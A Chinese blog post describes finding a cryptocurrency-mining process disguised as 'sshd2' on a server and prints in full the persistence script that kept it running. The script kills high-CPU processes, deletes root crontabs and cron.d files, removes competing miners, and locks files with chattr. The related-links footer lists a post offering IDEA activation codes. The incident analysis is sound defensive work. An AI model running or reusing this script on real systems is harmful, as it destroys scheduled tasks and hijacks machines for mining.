1. 全栈程序员必看首页

python挖矿脚本代码_一个挖矿脚本

全栈程序员-站长 未分类 阅读 25

python挖矿脚本代码_一个挖矿脚本遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户ps-ef查看到父进程是一个/tmp/javax/config.sh,这个文件在当前系统已经删除了,所以只能按照pid号通过lsof-pPID查看打开的文件句柄在/proc/PID/fd里面顺利找到执行脚本#!/bin…

大家好,又见面了,我是你们的朋友全栈君。

遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高

仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户

ps -ef查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄

在/proc/PID/fd里面顺利找到执行脚本

#!/bin/sh

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

while [ 1 ]

do

p=$(ps auxf|grep -v grep|grep sshd2|wc -l)

if [ ${p} -eq 0 ];

then

ps auxf|grep -v grep | awk ‘{if($3>=80.0) print $2}’| xargs kill -9

fi

chattr -i /var/spool/cron/root

chattr -i /var/spool/cron/crontabs/root

chattr -i /usr/local/bin/dns

pkill 6Tx3Wq

rm -f /tmp/6Tx3Wq

killall -9 38c985b26d38da0cbcc9f8ae3527e8e3b

killall -9 /tmp/.sysinfo/*

rm -f /tmp/.sysinfo/*

chattr +i /tmp/.sysinfo

rm -f /var/spool/cron/root

rm -f /var/spool/cron/backup.db

rm -f /var/spool/cron/dump.rdb

rm -f /var/spool/cron/jw

rm -f /var/spool/cron/uo

rm -f /var/spool/cron/vf

rm -f /tmp/root

rm -f /tmp/backup.db

rm -f /tmp/dump.rdb

rm -f /tmp/root

rm -f /var/spool/cron/crontabs/root

rm -f /var/spool/cron/crontabs/dump.rdb

killall -9 kworkerds

chattr -i /etc/cron.d/root

chattr -i /etc/cron.d/apache

chattr -i /etc/cron.d/0hourly

rm -f /etc/cron.d/root

rm -f /etc/cron.d/apache

rm -f /etc/cron.d/0hourly

rm -f /tmp/kworkerds

rm -f /var/tmp/kworkerds

rm -f /etc/cron.hourly/oanacroner

rm -f /etc/cron.hourly/oanacrona

rm -f /etc/cron.daily/oanacroner

rm -f /etc/cron.daily/oanacrona

rm -f /etc/cron.monthly/oanacroner

rm -f /usr/local/bin/dns

pkill .systemcero

pkill vTtHH

pkill -f /tmp/just4root

pkill -f /tmp/just4copy

pkill -f /tmp/dc_name

pkill x7

pkill cloudupdate

pkill diskmanagerd

pkill curl

pkill jspserv

pkill init

pkill sysupdate

pkill sysguard

pkill networkservice

pkill watchbog

rm -f /usr/share/watchbog/watchbog

rm -f /bin/httpsntp

rm -f /bin/ftpsntp

rm -f /tmp/.systemcero

rm -f /tmp/vTtHH

rm -f /usr/bin/.systemcero

rm -f /usr/bin/cloudupdate

rm -f /usr/bin/diskmanagerd

rm -f /lib/libterminfo.so

rm -f /tmp/config.json

rm -f /var/tmp/jspserv

rm -f /etc/update.sh

chattr -i /etc/sysupdate

rm -f /etc/sysupdate

rm -f /etc/config.json

echo >/tmp/6Tx3Wq

echo >/tmp/vTtHH

chattr +i /tmp/6Tx3Wq

chattr +i /tmp/vTtHH

p=$(ps auxf|grep sshd2|awk ‘{if($3>=70.0) print $2}’)

name=””$p

if [ -z “$name” ]

then

ps auxf|grep -v grep | awk ‘{if($3>=80.0) print $2}’| xargs kill -9

nohup /tmp/javax/sshd2 &>>/dev/null &

else

:

fi

sleep 60

done

从脚本的删除动作来看,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现

修复方案

时间短,修复不是我来操作的。初步并没有发现隐藏的激活方式,所以按照上面脚本的内容反向处理一下应该就可以了,注意防范redis的漏洞。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/158472.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 对抗攻击经典论文剖析(上)【FGSM、BIM、PGD、Carlini and Wagner Attacks (C&W)】

    对抗攻击经典论文剖析(上)【FGSM、BIM、PGD、Carlini and Wagner Attacks (C&W)】

    对抗攻击经典论文剖析(上)【FGSM、BIM、PGD、Carlini and Wagner Attacks (C&W)】最近做数据增广做的心累,想要看一看对抗攻击!这个博文会对四种经典算法进行剖析,分别是FGSM、BIM、PGD、CarliniandWagnerAttacks(C&W)。对抗攻击和防御首先我们简单来说一说对抗攻击和防御的目的。攻击就是对原始样本增加扰动生成对抗版本最大化损失函数,同时扰动尽可能地小,让人类肉眼无法察觉;防御问题是基于这种攻击方法训练一个更具鲁棒性的神经网络。数学表…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年6月14日
    5
  • Idea激活码最新教程2019.1.4版本,永久有效激活码,亲测可用,记得收藏 idea

    Idea激活码最新教程2019.1.4版本,永久有效激活码,亲测可用,记得收藏

    Idea激活码最新教程2019.1.4版本,永久有效激活码,亲测可用,记得收藏Idea 激活码教程永久有效 2019 1 4 激活码教程 Windows 版永久激活 持续更新 Idea 激活码 2019 1 4 成功激活

    全栈程序员-站长的头像 全栈程序员-站长
    2025年5月24日
    3
  • pnp饱和状态条件_二极管的极性判别

    pnp饱和状态条件_二极管的极性判别

    pnp饱和状态条件_二极管的极性判别1.截止状态:当b-e结反偏、零偏、浅正偏(指琐然正偏,似正向压降小于门槛电压)时Ib=0.Ic=Ice≈0,三极管截止,此时Rce内阻为无穷大,Vce约等于电源电压。  2.导通放大状态:当be正偏、bc反偏;且Vbe大于门槛电压时为导通放大状态,此时Vc>Vb>Ve.且Vbe=0.7V。导通后Rce减小,导通越深,Rce内阻越小.Vce越小。在放大状态,Ib能控制Ic.即具有电…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年9月7日
    6
  • 树莓派4b基础入门「建议收藏」

    树莓派4b基础入门「建议收藏」

    树莓派4b基础入门「建议收藏」目录一、树莓派百科知识二、树莓派4B图解及配件选择三、如何烧录系统?四、树莓派开机连接五、常见警示标志和故障排除六、格式化TF卡七、系统备份与恢复八、无线WiFi上网配置九、系统汉化教程十、键盘布局设置十一、树莓派扩展分区十二、开启SSH的4种方法十三、开启VNC的3种方法十四、Windows远程桌面连接十五、获取IP和MAC地址十六、设置静态IP十七、常见问题一、树莓派百科知识树莓派(RaspberryPi)是一款基于ARM的微型电脑主板,旨为学生计算机编程教育而设计,其系统基于Linux,由注册于

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月11日
    124
  • POJ 2996 Help Me with the Game (模拟)

    POJ 2996 Help Me with the Game (模拟)

    POJ 2996 Help Me with the Game (模拟)题目链接:http://poj.org/problem?id=2996POJ训练计划中的模拟都是非常棒的模拟,也非常有代表性。这个题讲的是给你一个国际象棋棋盘,敲代码打印出黑白两方的棋子。以及棋子的坐标。可是须要注意的国际棋盘的坐标问题例如以下图这个国际棋盘能够看到数字轴和字母轴的方向以及增减关系。所以在这个题的统计的时候须要进行坐标转换。由于已经做过类似的方法…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月12日
    10
  • set example(buildingexamples)

    set example(buildingexamples)

    //Examplesforusingsocat(andfilan)//”$”meansnormaluser,”#”requiresprivileges,”//”startsacomment/////////////////////////////////////////////////////////////////////////////////si

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月17日
    70

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号